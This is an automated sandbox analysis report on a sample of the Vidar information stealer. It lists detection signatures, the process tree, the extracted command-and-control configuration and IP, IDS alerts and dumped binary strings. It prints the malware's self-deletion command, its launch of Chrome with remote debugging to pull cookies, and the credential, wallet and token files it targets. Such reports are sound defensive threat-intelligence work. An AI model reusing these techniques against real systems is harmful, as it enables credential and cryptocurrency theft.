Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:	1.exe
Analysis ID:	1619385
MD5:	efc2de49c53a388807ef989c2f6efa46
SHA1:	4ae5eeb4363c9f8b04bab4a1e40e4f057f74896c
SHA256:	1fed343aeac08b762cc565480913c8d0abfde1f3b18c79dc9e0a5133da903c46
Tags:	exeuser-skocherhan
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious PE digital signature

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Searches for specific processes (likely to inject)

Self deletion via cmd or bat file

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

1.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\1.exe" MD5: EFC2DE49C53A388807EF989C2F6EFA46)

1.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\1.exe" MD5: EFC2DE49C53A388807EF989C2F6EFA46)

chrome.exe (PID: 7452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2328,i,17953878814576084473,5472811303795745123,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 7472 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\1.exe" & rd /s /q "C:\ProgramData\va1vs" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7996 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199828130190", "Botnet": "ot0yikam"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 1.exe PID: 7268	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 1.exe PID: 7300	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 1.exe PID: 7300	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\1.exe", ParentImage: C:\Users\user\Desktop\1.exe, ParentProcessId: 7300, ParentProcessName: 1.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7452, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:56:10.872515+0100	2044247	1	Malware Command and Control Activity Detected	116.202.180.73	443	192.168.2.4	49739	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:56:12.249750+0100	2051831	1	Malware Command and Control Activity Detected	116.202.180.73	443	192.168.2.4	49740	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:56:09.493834+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49738	116.202.180.73	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:56:13.740264+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49741	116.202.180.73	443	TCP
2025-02-19T20:56:14.704890+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49742	116.202.180.73	443	TCP
2025-02-19T20:56:23.562734+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49769	116.202.180.73	443	TCP
2025-02-19T20:56:24.037491+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49771	116.202.180.73	443	TCP
2025-02-19T20:56:25.004113+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49773	116.202.180.73	443	TCP
2025-02-19T20:56:26.030925+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49774	116.202.180.73	443	TCP
2025-02-19T20:56:27.775991+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49775	116.202.180.73	443	TCP
2025-02-19T20:56:28.080440+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49776	116.202.180.73	443	TCP
2025-02-19T20:56:29.127631+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49777	116.202.180.73	443	TCP
2025-02-19T20:56:30.168658+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49778	116.202.180.73	443	TCP
2025-02-19T20:56:31.220561+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49779	116.202.180.73	443	TCP
2025-02-19T20:56:32.194870+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49780	116.202.180.73	443	TCP
2025-02-19T20:56:34.383954+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49781	116.202.180.73	443	TCP
2025-02-19T20:56:48.568422+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58946	116.202.180.73	443	TCP
2025-02-19T20:56:49.574085+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58947	116.202.180.73	443	TCP
2025-02-19T20:56:50.417279+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58948	116.202.180.73	443	TCP
2025-02-19T20:56:51.494106+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58949	116.202.180.73	443	TCP
2025-02-19T20:56:52.575909+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58950	116.202.180.73	443	TCP
2025-02-19T20:56:53.621712+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58951	116.202.180.73	443	TCP
2025-02-19T20:56:54.634996+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58952	116.202.180.73	443	TCP
2025-02-19T20:56:55.792458+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58953	116.202.180.73	443	TCP
2025-02-19T20:56:56.776644+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58954	116.202.180.73	443	TCP
2025-02-19T20:56:57.764421+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58955	116.202.180.73	443	TCP
2025-02-19T20:56:58.655129+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58956	116.202.180.73	443	TCP
2025-02-19T20:57:00.943036+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58958	116.202.180.73	443	TCP
2025-02-19T20:57:02.058380+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58959	116.202.180.73	443	TCP
2025-02-19T20:57:03.149537+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	58961	116.202.180.73	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:56:24.037491+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49771	116.202.180.73	443	TCP
2025-02-19T20:56:25.004113+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49773	116.202.180.73	443	TCP
2025-02-19T20:56:26.030925+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49774	116.202.180.73	443	TCP
2025-02-19T20:56:28.080440+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49776	116.202.180.73	443	TCP
2025-02-19T20:56:29.127631+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49777	116.202.180.73	443	TCP
2025-02-19T20:56:30.168658+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49778	116.202.180.73	443	TCP
2025-02-19T20:56:31.220561+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49779	116.202.180.73	443	TCP
2025-02-19T20:56:32.194870+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49780	116.202.180.73	443	TCP
2025-02-19T20:56:34.383954+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49781	116.202.180.73	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:56:08.143493+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	49737	116.202.180.73	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://www.0e0.jp.eu.org/	Avira URL Cloud: Label: malware
Source: https://www.0e0.jp.eu.org	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199828130190", "Botnet": "ot0yikam"}

Multi AV Scanner detection for submitted file

Source: 1.exe	Virustotal: Detection: 41%			Perma Link
Source: 1.exe	ReversingLabs: Detection: 44%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009CE7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,		1_2_009CE7E9
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C5FE7 CryptUnprotectData,LocalAlloc,LocalFree,		1_2_009C5FE7

Source: 1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.180.73:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: 1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: 1.exe, 00000000.00000002.1675155262.0000000011A50000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: op\vdr1\Release\vdr1.pdb source: 1.exe, 00000001.00000002.2300297883.00000000009DB000.00000002.00000400.00020000.00000000.sdmp
Source:	Binary string: vdr1.pdb source: 1.exe, 00000000.00000002.1675155262.0000000011A50000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: op\vdr1\Release\vdr1.pdbA source: 1.exe, 00000001.00000002.2300297883.00000000009DB000.00000002.00000400.00020000.00000000.sdmp
Source:	Binary string: cryptosetup.pdbGCTL source: 1.exe, 00000001.00000002.2302254778.0000000003539000.00000004.00000020.00020000.00000000.sdmp, gvs0hv.1.dr
Source:	Binary string: cryptosetup.pdb source: 1.exe, 00000001.00000002.2302254778.0000000003539000.00000004.00000020.00020000.00000000.sdmp, gvs0hv.1.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: 1.exe, 00000000.00000002.1675155262.0000000011A50000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009CA69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,	1_2_009CA69C
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C7891 FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,	1_2_009C7891
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C6784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,CopyFileA,DeleteFileA,Sleep,CopyFileA,memset,CopyFileA,DeleteFileA,memset,FindNextFileA,FindClose,	1_2_009C6784
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D1187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	1_2_009D1187
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C13DA FindFirstFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindClose,	1_2_009C13DA
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D3B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscpy,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,	1_2_009D3B10
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C8776 FindFirstFileA,FindNextFileA,	1_2_009C8776
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C8224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_009C8224
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D2A5D wsprintfA,FindFirstFileA,StrCmpCA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_009D2A5D
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C9C78 wsprintfA,FindFirstFileA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_009C9C78
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D1BD2 wsprintfA,FindFirstFileA,FindNextFileA,FindClose,	1_2_009D1BD2
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D2539 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrlen,lstrlen,	1_2_009D2539

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009D1722 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrlen,

1_2_009D1722

Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 0MB later: 40MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49738 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49742 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49737 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49741 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49769 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49771 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49771 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49775 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49773 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49773 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49781 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49781 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49776 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49776 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49774 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49774 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.180.73:443 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49778 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49778 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49779 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49779 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49780 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49780 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49777 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49777 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.180.73:443 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58950 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58947 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58955 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58959 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58956 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58961 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58951 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58953 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58952 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58949 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:58954 -> 116.202.180.73:443
